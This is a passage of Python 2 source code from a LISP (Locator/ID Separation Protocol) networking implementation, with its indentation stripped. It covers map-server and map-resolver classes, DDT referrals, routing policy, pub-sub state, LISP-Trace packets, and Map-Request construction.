self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If this is a pull-based LISP-Decent DNS suffix, then create other
# lisp_mr() entries for all A-records. Only the master (A-record
# index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If this is a pull-based LISP-Decent DNS suffix, then create other
# lisp_ms() entries for all A-records. Only the master (A-record
# index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
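#
# valid_datetime() sanity checks the configured datetime string. The
# expected form, inferred from the parsing below, is
# "YYYY-MM-DD-HH:MM:SS", for example "2024-01-31-13:45:00".
#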
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#enddef
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
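#
# lisp_pubsub_cache is a two-level dictionary: an EID-prefix string maps
# to a dictionary of xtr-id -> lisp_pubsub() entries, as used by add()
# and delete() below.
#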
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
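# A JSON-encoded array of per-hop records (packet_json) follows the Nonce
# field on the wire; see encode() and decode() below.
#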
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
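#
# The cache key is the pre-NAT "local-rloc:port" string, for example
# "10.0.0.2:16001" (an illustrative value), and the value is the
# (translated-rloc, translated-port) tuple seen by the RTR.
#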
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
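#
# For example, with lisp_decent_dns_suffix "pull.example.com" (an
# illustrative value) and a computed index of 5, the lookup above selects
# the least recently used Map-Resolver whose dns-name is
# "5.pull.example.com".
#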
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return(None)
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return(packet)
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(source, dest):
if (lisp_last_map_request_sent == None): return(False)
now = lisp_get_timestamp()
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
if (source != None): source = source.print_address()
dest = dest.print_address()
dprint("Rate-limiting Map-Request for {} -> {}".format(source, dest))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port 4341 so the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
